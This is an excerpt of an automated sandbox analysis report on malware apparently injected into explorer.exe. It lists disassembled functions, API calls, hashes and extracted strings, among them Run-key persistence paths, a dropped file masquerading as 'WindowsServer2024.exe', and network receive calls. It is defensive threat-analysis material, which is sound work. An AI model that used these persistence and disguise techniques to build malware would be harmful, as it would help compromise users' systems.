                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                                                                            • String ID: {E5AC99DD-1415-4022-BE6C-AB9045565FB3}
                                                                            • API String ID: 1237952354-4116564367
                                                                            • Opcode ID: f849f3a4336449fa9ac388813d7629770bd7ad0e1afa6c6fa8222e9ffe5ab2fa
                                                                            • Instruction ID: 0c23c8af25dd7cbb2eb421f289002bdc37a48301cd2364ad36a6f6ea134050df
                                                                            • Opcode Fuzzy Hash: f849f3a4336449fa9ac388813d7629770bd7ad0e1afa6c6fa8222e9ffe5ab2fa
                                                                            • Instruction Fuzzy Hash: F2310771209B85C6F7609F24FCA4BAE77A0F384754F910225E68A83AA8DF7CC54DDB00
                                                                            Function 00BFC1F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63windowregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                                                                            • String ID: {6E456649-C3EE-4FD5-A6F9-EDD17ADE88F3}
                                                                            • API String ID: 1237952354-2008418920
                                                                            • Opcode ID: fca36edf4844be4939544b6fc52ab05d3dda8d3151a5665033656b6385d46372
                                                                            • Instruction ID: 35006e9b21b85394337f329680365bd23069965fde03fdb6d9873610f42d1c34
                                                                            • Opcode Fuzzy Hash: fca36edf4844be4939544b6fc52ab05d3dda8d3151a5665033656b6385d46372
                                                                            • Instruction Fuzzy Hash: A1311E31218B89D6F7209F24F864BAB77A1F785754F944225E68A43A75DFBCC58CCB00
                                                                            Function 00C04740 Relevance: 16.7, APIs: 11, Instructions: 234timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0477F
                                                                              • Part of subcall function 00C03370: recv.WS2_32 ref: 00C0339C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Timer$ChangeConcurrency::details::platform::__Queuerecv
                                                                            • String ID:
                                                                            • API String ID: 2709879575-0
                                                                            • Opcode ID: da0209bd51391d8aa85b3198e3e3358d7233d79bd4d519fc12b95e670b263445
                                                                            • Instruction ID: 83d697e78813107f1b4bdba27cacad96e6c99c3d874b475e331a1823d71e9ef3
                                                                            • Opcode Fuzzy Hash: da0209bd51391d8aa85b3198e3e3358d7233d79bd4d519fc12b95e670b263445
                                                                            • Instruction Fuzzy Hash: CAC1C6B26097C0CAE778CB16E4947ABB7A1F3C8744F108116DB9A87B98CB79C585CF01
                                                                            Function 00BE9070 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BE909E
                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00BE90D7
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BE9110
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • StrCmpIW.SHLWAPI ref: 00BE91E8
                                                                            • StrCmpIW.SHLWAPI ref: 00BE91FF
                                                                            • StrCmpIW.SHLWAPI ref: 00BE9216
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Directory$FileModuleNameSystemWindows_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                                                                            • API String ID: 4125122012-2596767422
                                                                            • Opcode ID: f19a94bb52d6cc6a767c822c61deb552883d9bdc9095b174110caaa3aa5838c9
                                                                            • Instruction ID: fbc089c485cd715e5ec4c328fe8ea808f53f52ce80c186dd4905f3b6e6b147a7
                                                                            • Opcode Fuzzy Hash: f19a94bb52d6cc6a767c822c61deb552883d9bdc9095b174110caaa3aa5838c9
                                                                            • Instruction Fuzzy Hash: 1B41EC65318AC496EB70DB35E8547DB63A2F788740F808536868DC3A68EF3DC61CCB45
                                                                            Function 00BEF370 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BEF3C5
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BEF382
                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 00BEF3DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run${AB1F3E47-AEF1-400E-A108-233A046C3A34}
                                                                            • API String ID: 849931509-2070010218
                                                                            • Opcode ID: 18b7775432b7624f2f27483179afdce4d241ea27d62cc07b0c6b43f001c51a34
                                                                            • Instruction ID: cd3c3c100e1d0851b37edd894ef269906bae014878bf57678ca96bc322995a29
                                                                            • Opcode Fuzzy Hash: 18b7775432b7624f2f27483179afdce4d241ea27d62cc07b0c6b43f001c51a34
                                                                            • Instruction Fuzzy Hash: EB01EC76611A82C2FA20DB11EC64BA96370FB95759F800722E99E426F8DF3CC648D704
                                                                            Function 00BEF510 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                            • lstrlenW.KERNEL32 ref: 00BEF59A
                                                                            • lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                            • LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                            • CoTaskMemFree.COMBASE ref: 00BEF647
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • lstrlenW.KERNEL32 ref: 00BEF620
                                                                            • CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\%s\
                                                                            • API String ID: 2748012262-2168696002
                                                                            • Opcode ID: 3c07c7a84a91b3dc76462a7bf42c2a39fbfc10208a3adc8cb45941fca1f6a139
                                                                            • Instruction ID: 2588dcdad0a0becdb74550aeffa3b6fdf951421d716f9ebebe24506dcb593e13
                                                                            • Opcode Fuzzy Hash: 3c07c7a84a91b3dc76462a7bf42c2a39fbfc10208a3adc8cb45941fca1f6a139
                                                                            • Instruction Fuzzy Hash: B0310C32608A8486EB50DB55E85479EB7B1F7C9B90F504125EB8E83B68DF7CC949CB00
                                                                            Function 00BEFA60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            • GetFileAttributesW.KERNEL32 ref: 00BEFB60
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • DeleteFileW.KERNEL32 ref: 00BEFB1A
                                                                            • RemoveDirectoryW.KERNEL32 ref: 00BEFB2D
                                                                            • LocalFree.KERNEL32 ref: 00BEFB40
                                                                            • LocalFree.KERNEL32 ref: 00BEFB55
                                                                            • GetFileAttributesW.KERNEL32 ref: 00BEFB77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocallstrlen$Attributes$AllocDeleteDirectoryFolderKnownPathRemoveTask_errno_invalid_parameter_noinfo
                                                                            • String ID: %s%s$WindowsServer2024.exe
                                                                            • API String ID: 2317434139-1924646418
                                                                            • Opcode ID: e2da916fe652659acde8d770e6f922c2bcde9ecaa5741bb1a987aef6a0334bc1
                                                                            • Instruction ID: 20be1c25420fa9aec94d791c65bb7fa99f2bb55b535c0a6e13f92045525d1178
                                                                            • Opcode Fuzzy Hash: e2da916fe652659acde8d770e6f922c2bcde9ecaa5741bb1a987aef6a0334bc1
                                                                            • Instruction Fuzzy Hash: 972121312249C591EB60DB35E8A87AE63A1F7C8B50F904632D69E836F8EF3CC549C700
                                                                            Function 00C057B0 Relevance: 13.6, APIs: 9, Instructions: 57memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
                                                                            • String ID:
                                                                            • API String ID: 3539965953-0
                                                                            • Opcode ID: 3eeff409c29a9f3811cd021c5063e1b720cbf15a1e6b5f811c1ca34045e3c13b
                                                                            • Instruction ID: 7a25211f6fbcc34776c665881f3a5146fc8da1c79b2055b76a919f1a948da52a
                                                                            • Opcode Fuzzy Hash: 3eeff409c29a9f3811cd021c5063e1b720cbf15a1e6b5f811c1ca34045e3c13b
                                                                            • Instruction Fuzzy Hash: 81213221328AC482EF70DB65E45576F63A1F7C5B80F908525DA9A87AA8DF3CC54CCB40
                                                                            Function 00BE47C0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 245synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, xrefs: 00BE4A1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocalObjectSingleWait
                                                                            • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                            • API String ID: 2302018356-4002695862
                                                                            • Opcode ID: bf519136ccd4abf063f206afac4ce43c27d6987f6cd99cde0c11dd423466edb2
                                                                            • Instruction ID: b7bb44ef5d71faafa0959c3ce7fb96c1d9dfe1a6669ab35ddb9781e1b49dd69d
                                                                            • Opcode Fuzzy Hash: bf519136ccd4abf063f206afac4ce43c27d6987f6cd99cde0c11dd423466edb2
                                                                            • Instruction Fuzzy Hash: 4FE1E676206BC0C6FB64CF04F4E57AAB3A0F795704F51026AD68E8A7A8DB7CC549CB41
                                                                            Function 00BE4570 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 50registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegCreateKeyExW.KERNEL32 ref: 00BE45F4
                                                                            • RegSetValueExW.KERNEL32 ref: 00BE462B
                                                                            • RegCloseKey.KERNEL32 ref: 00BE463A
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE464C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                                                                            • String ID: ?$SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 3235468379-3300995349
                                                                            • Opcode ID: 15bdf1c67f0d6b560ef70f455f76c195d322f5fde68ac703d852846817008838
                                                                            • Instruction ID: 617d7f1045778a4d89d224e285a7579f536ae49a74cfd2ffd471584dd1b65147
                                                                            • Opcode Fuzzy Hash: 15bdf1c67f0d6b560ef70f455f76c195d322f5fde68ac703d852846817008838
                                                                            • Instruction Fuzzy Hash: 29212E36218B8086E750DF65F894B5AB3A0F785754F404626AA9D83BA8DFBCC548CB04
                                                                            Function 00BE52C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegCreateKeyExW.KERNEL32 ref: 00BE5340
                                                                            • RegSetValueExW.KERNEL32 ref: 00BE5374
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE5383
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE5395
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                                                                            • String ID: ?$SOFTWARE\%s${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                            • API String ID: 3235468379-4032157612
                                                                            • Opcode ID: 6f8669e0a143de4aee4c000ac57a21c042559d5ee06530f0a717d06ee2fc9d18
                                                                            • Instruction ID: af044c1326d6c4ec9915e5fb9d72d8601d949357c81201c64019e907f4e949ae
                                                                            • Opcode Fuzzy Hash: 6f8669e0a143de4aee4c000ac57a21c042559d5ee06530f0a717d06ee2fc9d18
                                                                            • Instruction Fuzzy Hash: CB213632218B8582F7209F65F89875EB3A0F7C4794F504625EA8943BA8DFBCC548CB04
                                                                            Function 00BEF790 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7AF
                                                                            • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7C3
                                                                            • wnsprintfW.SHLWAPI ref: 00BEF7FC
                                                                            • lstrlenW.KERNEL32 ref: 00BEF80B
                                                                            • CoTaskMemFree.COMBASE ref: 00BEF81D
                                                                            • CoTaskMemFree.COMBASE ref: 00BEF82F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                                                                            • String ID: %s\%s
                                                                            • API String ID: 1665550476-4073750446
                                                                            • Opcode ID: 22d0398798acd8f4693eaf530b2968c768c5f25ad5cccc69d563900eb890bec1
                                                                            • Instruction ID: bfa2862b59a02506ed1a2935ddbf9db2895d793693550218b57da6437f6b55dd
                                                                            • Opcode Fuzzy Hash: 22d0398798acd8f4693eaf530b2968c768c5f25ad5cccc69d563900eb890bec1
                                                                            • Instruction Fuzzy Hash: E111E836628A81C2E750DF55E864B6A73A1FBC4B84F505521FA8F86A68DF7CC45ACB00
                                                                            Function 00BE4710 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • RegOpenKeyW.ADVAPI32 ref: 00BE474E
                                                                            • RegSetValueExW.KERNEL32 ref: 00BE4789
                                                                            • RegCloseKey.ADVAPI32 ref: 00BE4798
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
